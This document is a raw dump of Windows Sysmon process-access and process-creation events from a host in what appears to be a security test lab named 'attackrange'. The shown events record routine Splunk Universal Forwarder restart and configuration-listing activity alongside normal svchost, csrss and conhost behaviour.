12:02:53.509{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-64ED-6064-D400-00000000AE01}5468C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008108Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.509{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008107Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.509{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008106Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.509{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008105Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.509{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-64ED-6064-D400-00000000AE01}5468C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008104Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.509{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008103Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.509{266CAFBE-64ED-6064-D300-00000000AE01}57005768C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{266CAFBE-64ED-6064-D400-00000000AE01}5468C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008102Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.514{266CAFBE-64ED-6064-D400-00000000AE01}5468C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list httpServerListener: --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{266CAFBE-64ED-6064-D300-00000000AE01}5700C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list httpServerListener: --no-log 10341000x80000000000000008101Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.509{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-64ED-6064-D300-00000000AE01}5700C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008100Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.494{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008099Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.494{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008098Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.494{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008097Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.494{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-64ED-6064-D300-00000000AE01}5700C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008096Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.494{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008095Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.494{266CAFBE-64ED-6064-D200-00000000AE01}65764944C:\Windows\system32\cmd.exe{266CAFBE-64ED-6064-D300-00000000AE01}5700C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008094Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.507{266CAFBE-64ED-6064-D300-00000000AE01}5700C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list httpServerListener: --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{266CAFBE-64ED-6064-D200-00000000AE01}6576C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list httpServerListener: --no-log 10341000x80000000000000008093Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.494{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-64ED-6064-D200-00000000AE01}6576C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008092Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.494{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008091Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.494{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008090Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.494{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008089Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.494{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008088Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.494{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-64ED-6064-D200-00000000AE01}6576C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008087Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.494{266CAFBE-64E9-6064-C000-00000000AE01}67366740C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE{266CAFBE-64ED-6064-D200-00000000AE01}6576C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+13ac4|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+12176|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+19082|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+d94e|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008086Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.501{266CAFBE-64ED-6064-D200-00000000AE01}6576C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list httpServerListener: --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-64E9-6064-C000-00000000AE01}6736C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE" restart --waitonpid=2796 10341000x80000000000000008085Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.213{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-64ED-6064-D100-00000000AE01}5472C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008084Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.213{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008083Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.213{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008082Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.213{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008081Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.213{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-64ED-6064-D100-00000000AE01}5472C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008080Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.213{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008079Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.213{266CAFBE-64ED-6064-D000-00000000AE01}65845048C:\Program 